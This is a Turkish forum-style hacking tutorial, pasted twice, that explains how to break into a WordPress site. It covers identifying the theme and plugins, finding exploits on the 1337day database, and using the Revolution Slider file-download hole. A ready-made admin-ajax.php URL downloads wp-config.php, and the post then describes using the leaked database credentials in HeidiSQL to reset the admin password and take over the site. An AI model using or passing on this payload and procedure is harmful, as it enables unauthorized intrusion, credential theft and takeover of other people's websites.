Bugün Hedef Site hack ile ilgili Kısa bir Makale Oluşturacağım
Atıyorum.. Hedef Sitemiz: www.orneksitemizz.com
Sistemi Ne ? Wordpressmi ? Mybbmi ? Yoksa php bir scriptmi?
Eğer Wordpress ise 1337Day Agreement - 1337day Inj3ct0r Exploit Database : vulnerability : 0day : new exploits : buy and sell private exploit : shellcode by Inj3ct0r Team
Güncel Exploit Sitesidir Burayı yan sekmede Açıyoruz
Ardından : WordPress Theme Detector - Free online tool to find a site´s theme
Bu adrese giriyoruz ve siteyi yazıp detektör işlemini başlatıyoruz Peki bu ne işe yarıyacak ?
Wordpress Sitenin Temasının adı ve kullandığı Eklentileri Bize çıkartacak peki bu ne işimize yarıyacak ?
Atıyorum Sitede U-Design diye bir tema mevcut 1337day.com'a girip U-Design diye arattığımızda o temaya Ait Açıklar
Karşımıza gelecektir Peki Girdik Bu exploit şöyle birşeymiş :
Bu Açık revslider eklentisi açığı ama bu temada o eklenti daha sık kullanıldığı için o temanın açığı olarak public etmişler
Burdaki kısım target bölümüne site.com path bölümüne eğer site başka bir klosör içine kurulmuşsa yazın kurulmamışsa yazmanıza gerek yok yazalım şimdi
Bu URL yi bu şekil hazırlayıp tarayıcımızı açıp url kısmına yapıştırıp enter dediğiniz wp-config dosyası inmiş olacaktır
Peki bu dosya ne işe yarıyacak ?
Uzaktan HeidiSQL yardımı ile sitenin veritabanına ulaşabilir ve admin şifresini değiştirip siteye girebilirsiniz
HeidiSql İndirmek İçin Tıkla
Alıntıdır.
Atıyorum.. Hedef Sitemiz: www.orneksitemizz.com
Sistemi Ne ? Wordpressmi ? Mybbmi ? Yoksa php bir scriptmi?
Eğer Wordpress ise 1337Day Agreement - 1337day Inj3ct0r Exploit Database : vulnerability : 0day : new exploits : buy and sell private exploit : shellcode by Inj3ct0r Team
Güncel Exploit Sitesidir Burayı yan sekmede Açıyoruz
Ardından : WordPress Theme Detector - Free online tool to find a site´s theme
Bu adrese giriyoruz ve siteyi yazıp detektör işlemini başlatıyoruz Peki bu ne işe yarıyacak ?
Wordpress Sitenin Temasının adı ve kullandığı Eklentileri Bize çıkartacak peki bu ne işimize yarıyacak ?
Atıyorum Sitede U-Design diye bir tema mevcut 1337day.com'a girip U-Design diye arattığımızda o temaya Ait Açıklar
Karşımıza gelecektir Peki Girdik Bu exploit şöyle birşeymiş :
Kod:
http://[target]/[path]/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.phpBu Açık revslider eklentisi açığı ama bu temada o eklenti daha sık kullanıldığı için o temanın açığı olarak public etmişler
Kod:
http://[target]/[path]/Burdaki kısım target bölümüne site.com path bölümüne eğer site başka bir klosör içine kurulmuşsa yazın kurulmamışsa yazmanıza gerek yok yazalım şimdi
Kod:
http://iorneksitemizz.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.phpBu URL yi bu şekil hazırlayıp tarayıcımızı açıp url kısmına yapıştırıp enter dediğiniz wp-config dosyası inmiş olacaktır
Peki bu dosya ne işe yarıyacak ?
Uzaktan HeidiSQL yardımı ile sitenin veritabanına ulaşabilir ve admin şifresini değiştirip siteye girebilirsiniz
HeidiSql İndirmek İçin Tıkla
Alıntıdır.
